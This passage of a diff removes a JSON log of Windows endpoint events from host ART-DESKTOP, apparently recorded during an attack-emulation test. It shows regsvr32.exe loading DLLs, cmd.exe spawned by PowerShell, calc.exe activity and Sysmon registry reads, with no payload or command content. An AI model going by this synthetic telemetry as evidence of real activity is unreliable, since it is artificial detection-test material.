"terminate", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6748, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573243530000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "wow64cpu.dll", - "image_path": "C:\\Windows\\System32\\wow64cpu.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", - "registry_value": "ApplicationAssociationToasts", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\SysWOW64\\user32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243540000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\profapi.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243700016, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573243860000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573244020000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "process", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ieframe.dll", - "image_path": "C:\\Windows\\System32\\ieframe.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573244650000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573244800000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 